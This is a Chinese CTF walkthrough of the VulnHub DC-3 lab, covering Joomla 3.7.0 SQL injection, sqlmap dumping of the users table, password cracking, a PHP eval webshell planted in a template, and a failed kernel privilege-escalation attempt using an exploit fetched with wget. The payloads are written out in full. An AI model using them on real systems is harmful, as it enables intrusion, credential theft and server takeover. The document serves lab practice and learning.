靶场搭建
靶场描述:DC-3是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
与之前的DC版本一样,这个版本是为初学者设计的,尽管这次只有一个标志、一个入口点,根本没有任何线索。
必须具备Linux技能和熟悉Linux命令行,以及一些基本渗透测试工具的经验。
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7上发推特给我寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。
对于那些有CTF和Boot2Root挑战经验的人来说,这可能根本不会花你太长时间(事实上,它可能很容易花你不到20分钟)。
如果是这样的话,如果你想让它更具挑战性,你总是可以重做挑战,探索其他获得根和标志的方法。
靶场下载:vulnhub——DC-3
导入虚拟机 打开 (攻击机、靶机都是NAT模式,在同一网段内
拿nmap扫一下,攻击机是67.143,看到一个67.140的陌生ip
(偷偷作弊看一下mac地址对不对
对上了,那就是他了!
扫一下全端口,还是只有80端口
nmap -Pn -sV -p 1-65535 192.168.67.140
那没别的选择了
是一个登陆页面
wappalyzer指纹识别cms是Joomla
啥也不知道,扫一下目录,看到了后台登陆页面
http://192.168.67.140/administrator/index.php
去百度了一下默认账号口令,进不去
搜到了两个 漏洞利用工具
第一个看着安装麻烦,需要vscode,选第二个…
一条命令安装成功
扫一下这个站
joomscan --url http://192.168.67.140
扫到了版本号3.7.0和那个后台页面
这,有啥用
查了这个版本好像是有sql注入
漏洞验证:
http://192.168.67.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
返回了报错信息
用sqlmap扫一下
sqlmap -u http://192.168.67.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
扫出来 get型报错注入和时间盲注
查看当前数据库
sqlmap -u “http://192.168.67.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)” --current-db
数据库名称: joomladb
查看数据库下的表名
sqlmap -u “http://192.168.67.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)” --tables -D joomladb
接着查uses表的字段
sqlmap -u “http://192.168.67.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)” -D “joomladb” -T “#__users” --columns
一共6个字段,重点关注username和password
sqlmap -u “http://192.168.67.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” -D “joomladb” -T “#__users” -C “name,password” --dump
把加密的密码粘出来放txt里,用john破解一下
admin/snoopy
登进来了
找一个模板,写入一句话木马(我找了好久才找到。。。看了其他wp 我还是找了半天,,,大家都没写这么细,可能就我太笨了。。。)
创建新文件
这里我用火狐点不开那个NEW File,后面改用chrom一点问题没有
创建一个shell文件
写入一句话木马
<?php @eval($_POST['shell']); ?>
保存
okokok找不到文件呢
路径错了,,,我php文件传到根目录下,没传到html文件夹中,果然不能照抄,无语
(菜鸡真是坎坷啊
这次访问到了
http://192.168.67.140/templates/beez3/shell.php
用蚁剑连接一下,测试连接没问题
成功添加shell
查看当前用户
想用老办法find提权,,没有suid权限文件
查看当前可执行的命令
echo $PATH //输出环境变量
ls xxx路径 //检查当前路径下是否存在可执行的文件
看到了vi
在/var/www/html下vi一个txt
后面不会了,偷看了答案
ubuntu 16.04有一个提权漏洞,可以利用一下
Ubuntu 版本 16.04 存在本地提权漏洞,该漏洞存在于 Linux 内核带有的 eBPF bpf(2) 系统调用中,当用户提供恶意 BPF 程序使 eBPF 验证器模块产生计算错误,导致任意内存读写问题。
攻击者(普通用户)可以利用该漏洞进行提权攻击,获取 root 权限,危害极大。该漏洞编号是CVE-2017-16995。
Ubuntu 内核提权漏洞复现——拼客学院陈鑫杰
查看系统版本ubuntu16.04
在msf上搜索一下ubuntu 16.04提权漏洞
searchsploit Ubuntu 16.04
searchsploit -x local/39772.txt
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
下载
上传到/var/www/html目录下
上传成功
在蚁剑中解压
cd 39227
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
咋没提成功啊。。
换了个目录,把zip上传到tmp目录下
正常的话应该是可以提权的,整了半天,也没出来,,,,好像不止我一个人报这个错,有没有大神来指导一下/(ㄒoㄒ)/~~